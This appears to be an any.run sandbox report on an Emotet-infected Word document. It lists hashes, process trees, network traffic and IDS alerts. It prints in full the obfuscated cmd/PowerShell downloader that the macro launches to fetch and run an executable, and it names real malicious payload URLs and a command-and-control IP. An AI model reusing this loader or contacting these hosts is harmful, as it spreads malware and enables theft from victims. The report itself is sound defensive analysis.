download: | 6UL118444.doc |
Full analysis: | https://app.any.run/tasks/b563ba4f-2502-44f1-8c07-5b0b80702012 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2019, 16:49:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Alexa-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 12 12:12:00 2018, Last Saved Time/Date: Mon Nov 12 12:12:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | E7DC239954041896E6AE74ABD03CE15C |
SHA1: | 0DBE8F1E5A3C5548EF2D1C663B3C7F5F904C1E47 |
SHA256: | 18BF984F55B165527E4FA212BB339890259E44F6356BD8DF712BA324C19874D0 |
SSDEEP: | 1536:5skFocn1kp59gxBK85fBt+a9bGaHOmmlEFYFyJ7bTZalMlE1ChyqvH:5s141k/W48hGmmlEFYFyJ7bTZalMlE1k |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | Alexa-PC |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:11:12 12:12:00 |
ModifyDate: | 2018:11:12 12:12:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 13 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 14 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3012 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6UL118444.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 1073807364 Version: 14.0.6024.1000 | ||||
4088 | CMD /c Cmd.EXE /C"SEt Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.^| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc- 63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[( ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&( $EnV:comSPeC[4,15,25]-JOiN'')&&POwErSheLl ^& ( \"{1}{0}\"-f'eX','i' ) (( ^& ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2680 | Cmd.EXE /C"SEt Mdal= ( [regEX]::MATcheS( ")''Nioj-'X'+]3,1[)(gNIrTsOT.eCNEreFErPEsOBrEv$ (.| )93]raHc[,)99]raHc[+501]raHc[+58]raHc[( ecalperc- 63]raHc[,)89]raHc[+601]raHc[+221]raHc[(ecALPER- 421]raHc[,)001]raHc[+45]raHc[+98]raHc[( ecALPER- )') '+'(Dn'+'Eo'+'tDA'+'e'+'R'+'.'+') '+'}'+' '+') iICS'+'a::]GNiDo'+'cne.TX'+'et[ , _bjz (r'+'E'+'DA'+'eR'+'mae'+'R'+'ts.oI'+' '+'Tcejb'+'o-'+'WEN{T'+'cejbO-hcAe'+'rOFd6Y )'+' '+'sseRPmocEd::]eDom'+'no'+'I'+'S'+'s'+'E'+'rPMOC.'+'N'+'OIs'+'S'+'e'+'rp'+'MoC.Oi.Metsy'+'S[ ,'+' )'+'c'+'iU==g'+'B'+'6T'+'X8ZDpQJ'+'luNy5FdT'+'+'+'s'+'QYRWw0a'+'H'+'a0'+'VPg'+'qKy5z'+'aMlMgl'+'JMqyOz'+'Xzl'+'Y'+'su'+'7M43rqia'+'mI'+'peS4XrZA'+'J1y'+'u'+'Y5R4'+'OuB0jq'+'1PBbbt'+'CcbdrZMa'+'5x'+'n+RTsc5'+'9a'+'RoFi9'+'x'+'34'+'PZVb'+'j'+'B1qWdsxzU'+'0comd'+'z'+'n5cM5'+'EEPhe'+'GwM'+'XQ'+'D2'+'/Pz6Rrd'+'f'+'z0cnH'+'4P'+'6'+'BiPQlJJ'+'NVI'+'E1K'+'X'+'Q'+'F'+'bWDF'+'ILTui'+'3rFcLBy'+'+M8RD8'+'O'+'D9Q'+'SOrI'+'3SAP'+'z'+'2evGd6PBR3dB'+'7Xr8'+'ivIci46'+'5aH'+'Yd'+'LBi'+'cZlc'+'I'+'Xsf'+'d'+'9Tf'+'C'+'r6lulJ'+'u'+'MoASHaVgOx'+'MZ7AVM'+'6T'+'m7'+'TKo9See'+'II812E'+'ciL0w'+'FVRQ0K'+'7Q'+'Ibxj'+'2'+'O7j'+'jUTK'+'Mt'+'3w9U'+'gMS/QocdzJYBD'+'12T'+'zJ'+'y'+'sz'+'5'+'z55vpxi'+'7urwRU2'+'2N'+'pDU2aAUNLe'+'Q'+'E'+'h'+'CxRH0HEaI6EHcj3S'+'QK2'+'8'+'S'+'Zf'+'VIExIgTd'+'DZ'+'RciU(gNirTs46EsAbm'+'ORF'+'::]TR'+'EV'+'noc'+'.MET'+'s'+'YS[ '+']maeRTs'+'YR'+'O'+'M'+'EM.Oi.M'+'eTsYS'+'[ (MAerTSetAL'+'fed.NO'+'iS'+'sERP'+'mOC.Oi.mEts'+'ys Tcejbo-WEN ( )ci'+'UciUNio'+'J-'+'c'+'iUXciU+'+']'+'3,'+'1[)'+'E'+'CNeREFe'+'RP'+'eso'+'BrE'+'vbj'+'z]Gn'+'ir'+'ts[( '+'(. '((",'.', 'r'+'igHtto'+'leFT') -JOin '') ^| ^&( $EnV:comSPeC[4,15,25]-JOiN'')&&POwErSheLl ^& ( \"{1}{0}\"-f'eX','i' ) (( ^& ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" )" | C:\Windows\system32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2932 | POwErSheLl & ( \"{1}{0}\"-f'eX','i' ) (( & ( \"{1}{0}\"-f'iR','d' ) (\"{1}{0}{2}\" -f'dA','Env:m','L' )).\"V`ALUe\" ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3952 | "C:\Users\admin\AppData\Local\Temp\394.exe" | C:\Users\admin\AppData\Local\Temp\394.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
2584 | "C:\Users\admin\AppData\Local\Temp\394.exe" | C:\Users\admin\AppData\Local\Temp\394.exe | 394.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3544 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | 394.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
4056 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 1073807364 Version: 6.2.9200. |
PID | Process | Filename | Type | |
---|---|---|---|---|
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE563.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4T94GICG78ZL62Q5LU7V.temp | — | |
MD5:— | SHA256:— | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF912D573C4DEEAF12.TMP | — | |
MD5:— | SHA256:— | |||
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
2932 | powershell.exe | C:\Users\admin\AppData\Local\Temp\394.exe | executable | |
MD5:B748C2C3B7420647F57C82C288CE1647 | SHA256:5CFD134C67B2EA0DDD16A2B7F1E639F4B71301EFE22775CE5639A2338FF8576F | |||
2584 | 394.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:B748C2C3B7420647F57C82C288CE1647 | SHA256:5CFD134C67B2EA0DDD16A2B7F1E639F4B71301EFE22775CE5639A2338FF8576F | |||
2932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20eff2.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$L118444.doc | pgc | |
MD5:D381ADFFF2D58081C2168EEE10AE3721 | SHA256:67DECE0B1C5F646CAD095D250B2A1E9DF6C132C49AD4031CAE752C6371CC351C | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:7261EB6FD62F078A859E03E917B42E56 | SHA256:656F7759AC706C7C9308FF39822D7803301642B802B62137D84D6A0F924D316C | |||
3012 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9CF5976A-0CF7-4F52-A8F6-2C04D6230566}.tmp | binary | |
MD5:C37C81E721C9788A34CBE4ADFDC488A4 | SHA256:E1410D70F5CE4D58DC672F47C2DABE7BCC30706E97EB4CA6F9A60F6D5E22F14B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4056 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
2932 | powershell.exe | GET | 200 | 190.187.192.211:80 | http://corporaciondelsur.com.pe/1QByaBRWa/ | PE | executable | 448 Kb | malicious |
2932 | powershell.exe | GET | 301 | 190.187.192.211:80 | http://corporaciondelsur.com.pe/1QByaBRWa | PE | html | 340 b | malicious |
2932 | powershell.exe | GET | 403 | 38.76.31.227:80 | http://www.alefbookstores.com/sources/Fix-Serialization/PXjjiWaEs7/ | US | text | 15 b | malicious |
2932 | powershell.exe | GET | 301 | 38.76.31.227:80 | http://www.alefbookstores.com/sources/Fix-Serialization/PXjjiWaEs7 | US | html | 178 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2932 | powershell.exe | 38.76.31.227:80 | www.alefbookstores.com | Cogent Communications | US | malicious |
4056 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
2932 | powershell.exe | 190.187.192.211:80 | corporaciondelsur.com.pe | AMERICATEL PERU S.A. | PE | malicious |
Domain | IP | Reputation |
---|---|---|
www.alefbookstores.com |
| malicious |
corporaciondelsur.com.pe |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2932 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2932 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2932 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2932 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2932 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
4056 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
4056 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |